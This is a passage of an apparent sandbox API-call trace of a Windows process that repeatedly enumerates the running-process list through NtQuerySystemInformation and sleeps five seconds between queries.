[0256.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.249] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.301] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.317] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 